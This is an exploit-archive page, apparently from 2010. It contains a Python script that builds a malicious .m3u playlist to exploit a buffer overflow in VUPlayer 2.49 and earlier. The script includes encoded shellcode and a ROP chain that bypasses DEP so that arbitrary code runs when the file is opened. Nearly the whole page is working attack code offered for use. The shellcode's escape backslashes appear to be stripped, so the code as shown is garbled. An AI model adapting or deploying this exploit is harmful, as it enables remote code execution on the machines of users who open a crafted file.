VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/
Posted on 07 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================================== VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass ==================================================================== #!/usr/bin/env python # # VUPlayer <=2.49 .M3u Universal buffer overflow exploit w/ DEP bypass # Author: mr_me # Download: http://vuplayer.com/ # Tested on Wind0ws XP SP3 /noexecute=alwayson # Greetz: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # DEP bypass version # Thanks to Sud0 & Lincoln, for the motivation to learn this :-) # # http://www.metasploit.com # EXITFUNC=process, CMD=calc.exe sc = ("x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49" "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" "x58x34x41x50x30x41x33x48x48x30x41x30x30x41" "x42x41x41x42x54x41x41x51x32x41x42x32x42x42" "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a" "x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47" "x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c" "x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a" "x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46" "x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45" "x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c" "x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c" "x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44" "x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c" "x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46" "x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50" "x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44" "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45" "x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43" "x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b" "x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43" "x51x42x4cx42x43x43x30x41x41"); crash = "HTTP://" + "x41" * 1005 rop = "xd3x72x60x10" # POPAD # JE SHORT BASSMIDI.10607337 : 0x106072D3 rop += "x2fx10x60x10" # POP EDI # MOV EAX,ESI # POP ESI # RETN : 0x1060102F rop += "x13x22x80x7c" # @ of WriteProcessMemory() : 0x7C802213 rop += "xcfx22x80x7c" # Address to patched in kernel32 : 0x7C8022CF rop += "x44x44x44x44" # JUNK : 0x44444444 rop += "xffxffxffxff" # start @ -1 for shellcode size : 0xffffffff rop += "x15x10x10x10" # This @ from .data segment of app dll : 0x10101015 rop += "x44x44x44x44" # JUNK : 0x44444444 rop += "x44x44x44x44" # JUNK : 0x44444444 rop += "x44x44x44x44" # JUNK : 0x44444444 rop += "x79x21x60x10" # POP EDI # POP ESI # RETN : 0x10602179 rop += "x88x71x60x10" # CALL EAX : 0x10607188 rop += "xffxffxffxff" # -hProcess argv[1] : 0xffffffff # Get the length of shellcode - @ from kernel32 :( rop += "x6fx10x81x7c" * 305 # INC EBX # RETN : 0x7C81106F # push all args on the stack for WPM() - @ from shell32.dll :( rop += "xf9x18xa1x7c" # PUSHAD # RETN : 0x7CA118F9 buffer = crash + rop + sc print "[+] Building .m3u file" file = open('cst-vuplayer.m3u','w'); file.write(buffer); file.close(); print "[+] Done" # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
